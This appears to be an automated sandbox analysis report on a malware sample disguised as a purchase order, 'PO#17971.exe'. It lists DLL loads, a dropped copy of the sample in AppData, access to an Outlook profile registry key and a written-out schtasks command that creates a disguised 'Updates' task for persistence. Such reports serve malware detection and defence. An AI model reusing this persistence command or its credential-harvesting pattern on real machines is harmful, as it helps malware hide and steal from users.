Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: textshaping.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: textinputframework.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: coremessaging.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: dpapi.dll

Source: C:\Users\user\Desktop\PO#17971.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Automated click: OK
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\PO#17971.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: PO#17971.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: PO#17971.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

9_2_004019F0

Source: C:\Users\user\Desktop\PO#17971.exe	Code function: 0_2_070D1568 pushfd ; iretd	0_2_070D1571
Source: C:\Users\user\Desktop\PO#17971.exe	Code function: 0_2_070D14B0 push eax; iretd	0_2_070D14B1
Source: C:\Users\user\Desktop\PO#17971.exe	Code function: 0_2_0710B178 push eax; ret	0_2_0710B179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_0041C40C push cs; iretd	9_2_0041C4E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_00423149 push eax; ret	9_2_00423179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_0041C50E push cs; iretd	9_2_0041C4E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_004231C8 push eax; ret	9_2_00423179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_0040E21D push ecx; ret	9_2_0040E230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_0041C6BE push ebx; ret	9_2_0041C6BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_0041BFCD pushad ; ret	9_2_0041BFCE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_0700E558 push eax; iretd	9_2_0700E559
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_09F66D70 pushad ; retf	9_2_09F66D79
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_09F67B6A push edx; retf	9_2_09F67B72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_09F69028 push ebx; retf	9_2_09F6902E
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Code function: 10_2_05601568 pushfd ; iretd	10_2_05601571
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Code function: 10_2_056014AA push eax; iretd	10_2_056014B1
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Code function: 10_2_05600370 push esi; ret	10_2_0560037A
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Code function: 10_2_05601219 push esi; ret	10_2_0560121E
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Code function: 10_2_0567B178 push eax; ret	10_2_0567B179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 16_2_064274E0 push es; ret	16_2_06427A75
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 16_2_0642E558 push eax; iretd	16_2_0642E559
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 16_2_08E561BE push es; iretd	16_2_08E561BF

Source: PO#17971.exe	Static PE information: section name: .text entropy: 7.717890393942163
Source: TZRtlifudvO.exe.0.dr	Static PE information: section name: .text entropy: 7.717890393942163

Source: C:\Users\user\Desktop\PO#17971.exe

File created: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\PO#17971.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TZRtlifudvO" /XML "C:\Users\user\AppData\Local\Temp\tmp55D6.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
